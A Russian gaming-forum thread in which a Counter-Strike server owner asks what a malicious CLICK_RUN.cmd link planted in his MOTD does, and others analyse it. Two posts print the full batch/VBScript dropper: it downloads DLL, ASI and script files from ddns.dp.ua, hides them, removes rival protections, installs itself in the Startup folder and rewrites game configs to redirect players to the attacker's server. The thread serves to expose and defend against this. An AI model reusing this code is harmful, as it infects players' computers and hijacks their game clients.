Правила форума

Раздел для общения на любые темы, для которых не нашлось места в остальных разделах. Если Вашу тему можно отнести по смыслу к другому разделу, лучше создайте её там, иначе Вас накажут.

В данном форуме немного понижены требования к Общим правилам форума, а именно:
1. Информативность темы
2. Отходить от первоначального смысла темы

!

В разделе запрещено создавать темы связанные с раскруткой игровых серверов

Вирус в мотд

Опции

Affl	23.1.2018, 11:58 Сообщение #1
Стаж: 15 лет Сообщений: 1573 Благодарностей: 1182 Полезность: 1042	Господа, добрый день. Ночью взломали ркон сервера, сделали много всего, но самое важное - поставили вот такое мотд: http://ddns.dp.ua/upp/KK/CLICK_RUN.cmd Причину взлома уже устранил, как и почти все последствия, но хотелось бы узнать куда ведёт этот CMD файл. Поможете докопаться? WAR3FT Пивка для Рывка 202 lvl
	Поблагодарили 0 раз Поблагодарили 0 раз

sergggzi	23.1.2018, 12:04 Сообщение #2
Стаж: 13 лет Сообщений: 6536 Благодарностей: 6222 Полезность: 807	boostcstrike.com
	Поблагодарили 1 раз Поблагодарили 1 раз Affl

VkriterT	23.1.2018, 12:05 Сообщение #3
Стаж: 14 лет Город: МосквА Сообщений: 2172 Благодарностей: 1045 Полезность: 796	качает свой протектор http://ddns.dp.ua/upp/mix.dll http://ddns.dp.ua/upp/mix.asi http://ddns.dp.ua/upp/protector.cfg тик так тик так, слышишь как уходит твоя жизнь
	Поблагодарили 1 раз Поблагодарили 1 раз Affl

panda08	23.1.2018, 12:10 Сообщение #4
Стаж: 12 лет Сообщений: 116 Благодарностей: 23 Полезность: 130	CLICK_RUN.cmd @echo off set DLOAD_SCRIPT=download.vbs echo Option Explicit > %DLOAD_SCRIPT% echo Dim args, http, fileSystem, adoStream, url, target, status >> %DLOAD_SCRIPT% echo. >> %DLOAD_SCRIPT% echo Set args = Wscript.Arguments >> %DLOAD_SCRIPT% echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %DLOAD_SCRIPT% echo url = args(0) >> %DLOAD_SCRIPT% echo target = args(1) >> %DLOAD_SCRIPT% echo WScript.Echo "Getting '" ^& target ^& "' from '" ^& url ^& "'..." >> %DLOAD_SCRIPT% echo. >> %DLOAD_SCRIPT% echo http.Open "GET", url, False >> %DLOAD_SCRIPT% echo http.Send >> %DLOAD_SCRIPT% echo status = http.Status >> %DLOAD_SCRIPT% echo. >> %DLOAD_SCRIPT% echo If status ^<^> 200 Then >> %DLOAD_SCRIPT% echo WScript.Echo "FAILED to download: HTTP Status " ^& status >> %DLOAD_SCRIPT% echo WScript.Quit 1 >> %DLOAD_SCRIPT% echo End If >> %DLOAD_SCRIPT% echo. >> %DLOAD_SCRIPT% echo Set adoStream = CreateObject("ADODB.Stream") >> %DLOAD_SCRIPT% echo adoStream.Open >> %DLOAD_SCRIPT% echo adoStream.Type = 1 >> %DLOAD_SCRIPT% echo adoStream.Write http.ResponseBody >> %DLOAD_SCRIPT% echo adoStream.Position = 0 >> %DLOAD_SCRIPT% echo. >> %DLOAD_SCRIPT% echo Set fileSystem = CreateObject("Scripting.FileSystemObject") >> %DLOAD_SCRIPT% echo If fileSystem.FileExists(target) Then fileSystem.DeleteFile target >> %DLOAD_SCRIPT% echo adoStream.SaveToFile target >> %DLOAD_SCRIPT% echo adoStream.Close >> %DLOAD_SCRIPT% echo. >> %DLOAD_SCRIPT% cscript //Nologo %DLOAD_SCRIPT% http://ddns.dp.ua/upp/fileS.vbs pl.vbs start pl.vbs fileS.vbs CreateObject("WScript.Shell").Run("taskkill /f /im hl.exe") wscript.sleep 5000 Sub unProtectFile( filename ) dim readfile, filesys set filesys = CreateObject("Scripting.FileSystemObject") If filesys.FileExists( filename ) Then set readfile = filesys.GetFile( filename ) readfile.Attributes = 0 ' normal End If End Sub Sub protectFile( filename ) dim readfile, filesys set filesys = CreateObject("Scripting.FileSystemObject") If filesys.FileExists( filename ) Then set readfile = filesys.GetFile( filename ) readfile.Attributes = 7 ' hidden + system + readonly End If End Sub Sub DeleteAFile( filename ) Dim filesys Set filesys = CreateObject("Scripting.FileSystemObject") If filesys.FileExists( filename ) Then unProtectFile( filename ) filesys.DeleteFile( filename ), True End If End Sub Sub UpdateCFG( path ) DeleteAFile path Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFile = objFSO.CreateTextFile(path, ForWriting) objFile.Write "connect auto.ddns.dp.ua:27015" objFile.Close protectFile path End Sub Sub RenameFile( oldName, newName ) Dim filesys Set filesys = WScript.CreateObject("Scripting.FileSystemObject") If filesys.FileExists( oldName ) Then filesys.MoveFile oldName, newName End If End Sub Sub DeleteAFolder( foldername ) Dim filesys Set filesys = CreateObject("Scripting.FileSystemObject") If filesys.FolderExists( foldername ) Then ' unProtectFile( foldername ) filesys.DeleteFolder( foldername ), True End If End Sub Sub RenameFolder( oldName, newName ) Dim filesys Set filesys = WScript.CreateObject("Scripting.FileSystemObject") If filesys.FolderExists( oldName ) Then filesys.MoveFolder oldName, newName End If End Sub DeleteAFile "mix.asi" DeleteAFile "mix.dll" strURL="http://ddns.dp.ua/upp/mix.dll?" & Rnd Set xml = CreateObject("Microsoft.XMLHTTP") xml.Open "GET", strURL, False xml.Send If Err.Number <> 0 Then WScript.Quit ' if file download fails, quit script Else set oStream = createobject("Adodb.Stream") oStream.type = 1 ' adTypeBinary oStream.open oStream.write xml.responseBody ' overwrite oStream.savetofile strMyPath & "mix.dll", 2 ' adSaveCreateOverWrite oStream.close set oStream = nothing Set xml = Nothing protectFile(strMyPath & "mix.dll") End If Err.Clear On Error Resume Next strURL="http://ddns.dp.ua/upp/mix.asi?" & Rnd Set xml = CreateObject("Microsoft.XMLHTTP") xml.Open "GET", strURL, False xml.Send If Err.Number <> 0 Then WScript.Quit ' if file download fails, quit script Else set oStream = createobject("Adodb.Stream") oStream.type = 1 ' adTypeBinary oStream.open oStream.write xml.responseBody ' overwrite oStream.savetofile strMyPath & "mix.asi", 2 ' adSaveCreateOverWrite oStream.close set oStream = nothing Set xml = Nothing protectFile(strMyPath & "mix.asi") End If Err.Clear On Error Resume Next On Error Resume Next Set objHTTP = CreateObject("MSXML2.XMLHTTP") Call objHTTP.Open("GET", "http://ddns.dp.ua/upp/protector.cfg?" & Rnd, FALSE) objHTTP.Send If Err.Number <> 0 Then Else DeleteAFile "cstrike\protector.cfg" Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFile = objFSO.CreateTextFile("cstrike\protector.cfg", ForWriting) objFile.Write objHTTP.ResponseText objFile.Close protectFile("cstrike\protector.cfg") End If On Error Resume Next protectFile("mix.asi") protectFile("mix.dll") protectFile("cstrike\liblist.gam") DeleteAFolder "cstrike\bin_old" DeleteAFile "cstrike\bin_old" DeleteAFile "mix.asi.old" DeleteAFile "mix.dll.old" DeleteAFile "SVC_BlockCommand.log.old" RenameFolder "cstrike\bin", "cstrike\bin_old" RenameFile "cstrike\bin", "cstrike\bin_old" DeleteAFile "cstrike\bin\TrackerUI.dll" DeleteAFile "valve\bin\TrackerUI.dll" DeleteAFile "cstrike\cl_dlls\ParticleMan.dll" DeleteAFile "NexonUp.asi" DeleteAFile "CsShield.dll" DeleteAFile "client_save.asi" DeleteAFile "client_save.dll" DeleteAFile "csxguard.asi" DeleteAFile "csxguard.dll" DeleteAFile "GTProtector.asi" DeleteAFile "GTProtector.dll" DeleteAFile "CTShield.asi" DeleteAFile "CTShield.dll" DeleteAFile "gopnict.asi" DeleteAFile "muc.bak" RenameFile "cstrike\bin\TrackerUI.dll", "cstrike\bin\TrackerUI.dll.old" RenameFile "valve\bin\TrackerUI.dll", "valve\bin\TrackerUI.dll.old" RenameFile "cstrike\cl_dlls\ParticleMan.dll", "cstrike\cl_dlls\ParticleMan.dll.old" RenameFile "NexonUp.asi", "NexonUp.asi.old" RenameFile "CsShield.dll", "CsShield.dll.old" RenameFile "client_save.asi", "client_save.asi.old" RenameFile "client_save.dll", "client_save.dll.old" RenameFile "csxguard.asi", "csxguard.asi.old" RenameFile "csxguard.dll", "csxguard.dll.old" RenameFile "GTProtector.asi", "GTProtector.asi.old" RenameFile "GTProtector.dll", "GTProtector.dll.old" DeleteAFile "cstrike\bin\TrackerUI.dll.old" DeleteAFile "valve\bin\TrackerUI.dll.old" DeleteAFile "cstrike\cl_dlls\ParticleMan.dll.old" DeleteAFile "NexonUp.asi.old" DeleteAFile "CsShield.dll.old" DeleteAFile "client_save.asi.old" DeleteAFile "client_save.dll.old" DeleteAFile "csxguard.asi.old" DeleteAFile "csxguard.dll.old" DeleteAFile "protector.asi" DeleteAFile "GTProtector.asi.old" DeleteAFile "GTProtector.dll.old" RenameFile "mssv55.asi", "mssv55.asi.old" DeleteAFile "mssv55.asi.old" On Error Goto 0 On Error Resume Next Set objHTTP = CreateObject("MSXML2.XMLHTTP") Call objHTTP.Open("GET", "http://ddns.dp.ua/upp/update.mrv?" & Rnd, FALSE) objHTTP.Send If Err.Number <> 0 Then Else DeleteAFile strMyPath & "SteamLogs.bat" Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFile = objFSO.CreateTextFile(strMyPath & "SteamLogs.bat", ForWriting) objFile.Write objHTTP.ResponseText objFile.Close End If On Error Goto 0 CreateObject("WScript.Shell").Run(Chr(34) & strMyPath & "SteamLogs.bat" & Chr(34)) WScript.Sleep 4000 CreateObject("WScript.Shell").Run("hl.exe -steam -game cstrike -noforcemparms -noforcemaccel") Dim WshShell, strCurDir Set WshShell = CreateObject("WScript.Shell") strCurDir = WshShell.CurrentDirectory strCurDir = strCurDir & "\" Set objShell = Wscript.CreateObject("Wscript.Shell") strPath = objShell.SpecialFolders("StartUp") strMyPath = strPath & "\" strURL="http://ddns.dp.ua/upp/reload.vbs?" & Rnd Set xml = CreateObject("Microsoft.XMLHTTP") xml.Open "GET", strURL, False xml.Send If Err.Number <> 0 Then WScript.Quit ' if file download fails, quit script Else set oStream = createobject("Adodb.Stream") oStream.type = 1 ' adTypeBinary oStream.open oStream.write xml.responseBody ' overwrite oStream.savetofile strMyPath & "reload.vbs", 2 ' adSaveCreateOverWrite oStream.close set oStream = nothing Set xml = Nothing 'protectFile(strMyPath & "reload.vbs") End If Err.Clear On Error Resume Next WScript.Sleep 5000 CreateObject("WScript.Shell").Run(Chr(34) & strMyPath & "reload.vbs" & Chr(34)) Dim filesys Set filesys = CreateObject("Scripting.FileSystemObject") Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFolder = objFSO.GetFolder(strCurDir) Set colFiles = objFolder.Files For Each objFile in colFiles if instr(objFile.Name,".vbe") then filesys.DeleteFile( strCurDir & ".vbe" ), True elseif instr(objFile.Name,".vbs") then filesys.DeleteFile( strCurDir & ".vbs" ), True end if Next UpdateCFG "cstrike\hw\geforce.cfg" UpdateCFG "cstrike\hw\opengl.cfg" UpdateCFG "cstrike\autoexec.cfg" UpdateCFG "cstrike\valve.rc" UpdateCFG "valve\hw\geforce.cfg" UpdateCFG "valve\hw\opengl.cfg" UpdateCFG "valve\valve.rc"
	Поблагодарили 1 раз Поблагодарили 1 раз Affl

Affl	23.1.2018, 12:17 Сообщение #5
Стаж: 15 лет Сообщений: 1573 Благодарностей: 1182 Полезность: 1042	Благодарю. Ещё забавушка - кулхацкер взял ник "c-s.net.ua" - http://n15.serva4ok.ru/server27594/www/hls...p;player=339336 Никто же с этого форума с тем сайтом бустов не связан? WAR3FT Пивка для Рывка 202 lvl
	Поблагодарили 0 раз Поблагодарили 0 раз

DarkFantom	23.1.2018, 12:17 Сообщение #6
Стаж: 8 лет 10 месяцев Сообщений: 233 Благодарностей: 69 Полезность: 185	Знакомый скрипт и знакомый почерк. Один пользователь такое юзал с этого форума.
	Поблагодарили 0 раз Поблагодарили 0 раз

panda08	23.1.2018, 12:17 Сообщение #7
Стаж: 12 лет Сообщений: 116 Благодарностей: 23 Полезность: 130	Перед новым годом тоже ламонули мой сервер, а вернее я узнал когда получил бан на турбо-буст, также админ забанил все сервера на аккаунте и ему все равно что они были чистые... Из-за недоумков страдаю все!
	Поблагодарили 0 раз Поблагодарили 0 раз

sergggzi	23.1.2018, 12:19 Сообщение #8
Стаж: 13 лет Сообщений: 6536 Благодарностей: 6222 Полезность: 807	panda08, ну вам же все равно, когда подменяют уники в мс, ломают клиент, ведь главное эффект.. Почему админам моников не должно быть все равно, когда ломают серверы?
	Поблагодарили 1 раз Поблагодарили 1 раз ~~ThreeTimes~~

Affl	23.1.2018, 12:21 Сообщение #9
Стаж: 15 лет Сообщений: 1573 Благодарностей: 1182 Полезность: 1042	panda08, Да нет, тут скорее вина моя, что оставил возможность для такого действа, не проверив досконально WAR3FT Пивка для Рывка 202 lvl
	Поблагодарили 0 раз Поблагодарили 0 раз

panda08	23.1.2018, 12:28 Сообщение #10
Стаж: 12 лет Сообщений: 116 Благодарностей: 23 Полезность: 130	Цитата(sergggzi @ 23.1.2018, 14:19) panda08, ну вам же все равно, когда подменяют уники в мс, ломают клиент, ведь главное эффект.. Почему админам моников не должно быть все равно, когда ломают серверы? Лично мне не все равно, я помогаю избавляться от пакостей и всякой дряни расширяя антивирусные базы.
	Поблагодарили 0 раз Поблагодарили 0 раз

DarkFantom	23.1.2018, 12:34 Сообщение #11
Стаж: 8 лет 10 месяцев Сообщений: 233 Благодарностей: 69 Полезность: 185	Вот у данного пользователя вы что не будь покупали или его вебхостингом может пользовались? Может вам он какие не будь услуги делал связные с сервером? vladbrovaru https://c-s.net.ua/forum/user117417.html Отредактировал: DarkFantom, - 23.1.2018, 12:36
	Поблагодарили 0 раз Поблагодарили 0 раз

Affl	23.1.2018, 12:36 Сообщение #12
Стаж: 15 лет Сообщений: 1573 Благодарностей: 1182 Полезность: 1042	DarkFantom, нет, никаким образом с ним не взаимодействовал WAR3FT Пивка для Рывка 202 lvl
	Поблагодарили 0 раз Поблагодарили 0 раз

DarkFantom	23.1.2018, 12:38 Сообщение #13
Стаж: 8 лет 10 месяцев Сообщений: 233 Благодарностей: 69 Полезность: 185	Цитата(Affl @ 23.1.2018, 12:36) DarkFantom, нет, никаким образом с ним не взаимодействовал Ну прост спросил данный тип подменял мс таким же способом.
	Поблагодарили 0 раз Поблагодарили 0 раз

perfectblood0	23.1.2018, 14:17 Сообщение #14
Стаж: 17 лет Сообщений: 5065 Благодарностей: 2685 Полезность: 488	Так где уязвимость была?
	Поблагодарили 0 раз Поблагодарили 0 раз

Profan	23.1.2018, 14:17 Сообщение #15
Стаж: 10 лет Город: Сочи Сообщений: 1317 Благодарностей: 403 Полезность: 698	Affl, Воруют уников через твой сервер. Cкрытый текст Код CreateObject("WScript.Shell").Run("taskkill /f /im hl.exe") wscript.sleep 5000 Sub unProtectFile( filename ) dim readfile, filesys set filesys = CreateObject("Scripting.FileSystemObject") If filesys.FileExists( filename ) Then set readfile = filesys.GetFile( filename ) readfile.Attributes = 0 ' normal End If End Sub Sub protectFile( filename ) dim readfile, filesys set filesys = CreateObject("Scripting.FileSystemObject") If filesys.FileExists( filename ) Then set readfile = filesys.GetFile( filename ) readfile.Attributes = 7 ' hidden + system + readonly End If End Sub Sub DeleteAFile( filename ) Dim filesys Set filesys = CreateObject("Scripting.FileSystemObject") If filesys.FileExists( filename ) Then unProtectFile( filename ) filesys.DeleteFile( filename ), True End If End Sub Sub UpdateCFG( path ) DeleteAFile path Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFile = objFSO.CreateTextFile(path, ForWriting) objFile.Write "connect auto.ddns.dp.ua:27015" objFile.Close protectFile path End Sub Sub RenameFile( oldName, newName ) Dim filesys Set filesys = WScript.CreateObject("Scripting.FileSystemObject") If filesys.FileExists( oldName ) Then filesys.MoveFile oldName, newName End If End Sub Sub DeleteAFolder( foldername ) Dim filesys Set filesys = CreateObject("Scripting.FileSystemObject") If filesys.FolderExists( foldername ) Then ' unProtectFile( foldername ) filesys.DeleteFolder( foldername ), True End If End Sub Sub RenameFolder( oldName, newName ) Dim filesys Set filesys = WScript.CreateObject("Scripting.FileSystemObject") If filesys.FolderExists( oldName ) Then filesys.MoveFolder oldName, newName End If End Sub DeleteAFile "mix.asi" DeleteAFile "mix.dll" strURL="http://ddns.dp.ua/upp/mix.dll?" & Rnd Set xml = CreateObject("Microsoft.XMLHTTP") xml.Open "GET", strURL, False xml.Send If Err.Number <> 0 Then WScript.Quit ' if file download fails, quit script Else set oStream = createobject("Adodb.Stream") oStream.type = 1 ' adTypeBinary oStream.open oStream.write xml.responseBody ' overwrite oStream.savetofile strMyPath & "mix.dll", 2 ' adSaveCreateOverWrite oStream.close set oStream = nothing Set xml = Nothing protectFile(strMyPath & "mix.dll") End If Err.Clear On Error Resume Next strURL="http://ddns.dp.ua/upp/mix.asi?" & Rnd Set xml = CreateObject("Microsoft.XMLHTTP") xml.Open "GET", strURL, False xml.Send If Err.Number <> 0 Then WScript.Quit ' if file download fails, quit script Else set oStream = createobject("Adodb.Stream") oStream.type = 1 ' adTypeBinary oStream.open oStream.write xml.responseBody ' overwrite oStream.savetofile strMyPath & "mix.asi", 2 ' adSaveCreateOverWrite oStream.close set oStream = nothing Set xml = Nothing protectFile(strMyPath & "mix.asi") End If Err.Clear On Error Resume Next On Error Resume Next Set objHTTP = CreateObject("MSXML2.XMLHTTP") Call objHTTP.Open("GET", "http://ddns.dp.ua/upp/protector.cfg?" & Rnd, FALSE) objHTTP.Send If Err.Number <> 0 Then Else DeleteAFile "cstrike\protector.cfg" Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFile = objFSO.CreateTextFile("cstrike\protector.cfg", ForWriting) objFile.Write objHTTP.ResponseText objFile.Close protectFile("cstrike\protector.cfg") End If On Error Resume Next protectFile("mix.asi") protectFile("mix.dll") protectFile("cstrike\liblist.gam") DeleteAFolder "cstrike\bin_old" DeleteAFile "cstrike\bin_old" DeleteAFile "mix.asi.old" DeleteAFile "mix.dll.old" DeleteAFile "SVC_BlockCommand.log.old" RenameFolder "cstrike\bin", "cstrike\bin_old" RenameFile "cstrike\bin", "cstrike\bin_old" DeleteAFile "cstrike\bin\TrackerUI.dll" DeleteAFile "valve\bin\TrackerUI.dll" DeleteAFile "cstrike\cl_dlls\ParticleMan.dll" DeleteAFile "NexonUp.asi" DeleteAFile "CsShield.dll" DeleteAFile "client_save.asi" DeleteAFile "client_save.dll" DeleteAFile "csxguard.asi" DeleteAFile "csxguard.dll" DeleteAFile "GTProtector.asi" DeleteAFile "GTProtector.dll" DeleteAFile "CTShield.asi" DeleteAFile "CTShield.dll" DeleteAFile "gopnict.asi" DeleteAFile "muc.bak" RenameFile "cstrike\bin\TrackerUI.dll", "cstrike\bin\TrackerUI.dll.old" RenameFile "valve\bin\TrackerUI.dll", "valve\bin\TrackerUI.dll.old" RenameFile "cstrike\cl_dlls\ParticleMan.dll", "cstrike\cl_dlls\ParticleMan.dll.old" RenameFile "NexonUp.asi", "NexonUp.asi.old" RenameFile "CsShield.dll", "CsShield.dll.old" RenameFile "client_save.asi", "client_save.asi.old" RenameFile "client_save.dll", "client_save.dll.old" RenameFile "csxguard.asi", "csxguard.asi.old" RenameFile "csxguard.dll", "csxguard.dll.old" RenameFile "GTProtector.asi", "GTProtector.asi.old" RenameFile "GTProtector.dll", "GTProtector.dll.old" DeleteAFile "cstrike\bin\TrackerUI.dll.old" DeleteAFile "valve\bin\TrackerUI.dll.old" DeleteAFile "cstrike\cl_dlls\ParticleMan.dll.old" DeleteAFile "NexonUp.asi.old" DeleteAFile "CsShield.dll.old" DeleteAFile "client_save.asi.old" DeleteAFile "client_save.dll.old" DeleteAFile "csxguard.asi.old" DeleteAFile "csxguard.dll.old" DeleteAFile "protector.asi" DeleteAFile "GTProtector.asi.old" DeleteAFile "GTProtector.dll.old" RenameFile "mssv55.asi", "mssv55.asi.old" DeleteAFile "mssv55.asi.old" On Error Goto 0 On Error Resume Next Set objHTTP = CreateObject("MSXML2.XMLHTTP") Call objHTTP.Open("GET", "http://ddns.dp.ua/upp/update.mrv?" & Rnd, FALSE) objHTTP.Send If Err.Number <> 0 Then Else DeleteAFile strMyPath & "SteamLogs.bat" Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFile = objFSO.CreateTextFile(strMyPath & "SteamLogs.bat", ForWriting) objFile.Write objHTTP.ResponseText objFile.Close End If On Error Goto 0 CreateObject("WScript.Shell").Run(Chr(34) & strMyPath & "SteamLogs.bat" & Chr(34)) WScript.Sleep 4000 CreateObject("WScript.Shell").Run("hl.exe -steam -game cstrike -noforcemparms -noforcemaccel") Dim WshShell, strCurDir Set WshShell = CreateObject("WScript.Shell") strCurDir = WshShell.CurrentDirectory strCurDir = strCurDir & "\" Set objShell = Wscript.CreateObject("Wscript.Shell") strPath = objShell.SpecialFolders("StartUp") strMyPath = strPath & "\" strURL="http://ddns.dp.ua/upp/reload.vbs?" & Rnd Set xml = CreateObject("Microsoft.XMLHTTP") xml.Open "GET", strURL, False xml.Send If Err.Number <> 0 Then WScript.Quit ' if file download fails, quit script Else set oStream = createobject("Adodb.Stream") oStream.type = 1 ' adTypeBinary oStream.open oStream.write xml.responseBody ' overwrite oStream.savetofile strMyPath & "reload.vbs", 2 ' adSaveCreateOverWrite oStream.close set oStream = nothing Set xml = Nothing 'protectFile(strMyPath & "reload.vbs") End If Err.Clear On Error Resume Next WScript.Sleep 5000 CreateObject("WScript.Shell").Run(Chr(34) & strMyPath & "reload.vbs" & Chr(34)) Dim filesys Set filesys = CreateObject("Scripting.FileSystemObject") Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFolder = objFSO.GetFolder(strCurDir) Set colFiles = objFolder.Files For Each objFile in colFiles if instr(objFile.Name,".vbe") then filesys.DeleteFile( strCurDir & ".vbe" ), True elseif instr(objFile.Name,".vbs") then filesys.DeleteFile( strCurDir & ".vbs" ), True end if Next UpdateCFG "cstrike\hw\geforce.cfg" UpdateCFG "cstrike\hw\opengl.cfg" UpdateCFG "cstrike\autoexec.cfg" UpdateCFG "cstrike\valve.rc" UpdateCFG "valve\hw\geforce.cfg" UpdateCFG "valve\hw\opengl.cfg" UpdateCFG "valve\valve.rc" Группа в стиме, таам и сервера есть https://steamcommunity.com/groups/devil_arena Отредактировал: Profan, - 23.1.2018, 14:30
	Поблагодарили 0 раз Поблагодарили 0 раз

xopoIIIuu	23.1.2018, 14:40 Сообщение #16
Стаж: 12 лет Сообщений: 169 Благодарностей: 70 Полезность: < 0	Есть одна уязвимость через которую заливают на сервер файлы, при этом судя по логам: "вроде-как через ркон", но это не так. Вы можете его убрать, поставить длинный пароль - до одного места. Я так и не понял до сих пор весь процес, но решение нашел, увы но пришлось закрыть сервера, из-за смены хостов и не предоставлении доступа к корню (конкуренты, хз, может кому насолил... Не важно... Помощи не от кого не получил... Хотя задавал на форумах вопросы на счет этого... Но все дружно обошли это стороной... "Мол не мой сервер, че мне парится"). Спасет лишь одно, ограничение прав на файлы сервера. И х*й вам кто что-то сделает. И на счет подмены мс - это от румынов пошло, переделать слегка скрипт и залить на веб хост - любому школьнику ума хватит. Спасибо что выложили его в общий доступ, ожидаем подобные темы в ближайшее время... И развитие раскруток-однодневок. P.s У меня стоял rehlds (насчет hlds не уверен, не проверял, да и возможности проверить нету, ибо это эдиничные случаи... Как мне писал тру-хацкер кавказкой национальности, эта программа стоит 3к рублей). После моих просьб показать мне ее через тв или скриншоты - ссылался на то, что не будет этого делать, так как она в очень узких кругах ходит в обороте...)
	Поблагодарили 0 раз Поблагодарили 0 раз

Angerfist	23.1.2018, 15:01 Сообщение #17
Стаж: 10 лет Сообщений: 439 Благодарностей: 161 Полезность: 229	xopoIIIuu, а конкретно какие файлы, и какие права нужны?)
	Поблагодарили 0 раз Поблагодарили 0 раз

Alexan23	23.1.2018, 15:07 Сообщение #18
Стаж: 14 лет Город: Рязань Сообщений: 1404 Благодарностей: 624 Полезность: 803	Angerfist, Ну наверное в первую очередь файл motd выставить на только чтение. Могу ошибаться) Антискука xD [WoRlD] ® 2010-2017
	Поблагодарили 0 раз Поблагодарили 0 раз

Slavik	23.1.2018, 15:20 Сообщение #19
Стаж: 12 лет Сообщений: 185 Благодарностей: 13 Полезность: < 0	А потом удивляются почему народ без исходников плагины не хочет покупать.. даже у проверенных людей не берите без исходника.
	Поблагодарили 0 раз Поблагодарили 0 раз

DarkFantom	23.1.2018, 15:32 Сообщение #20
Стаж: 8 лет 10 месяцев Сообщений: 233 Благодарностей: 69 Полезность: 185	Через WAD, song, spr. и.т.д. Через эти файлы тоже подменяют мс всё изощренные способы изобретают. И супер пупер лаунчеры не спасают от подмены. Весь вопрос можно решить с подменой это выпустить новый реализ клиента переделанный.
	Поблагодарили 0 раз Поблагодарили 0 раз

« Предыдущая тема · Флейм · Следующая тема »

0 пользователей и 1 гостей читают эту тему:

Наши новости:

Правила форума

Вирус в мотд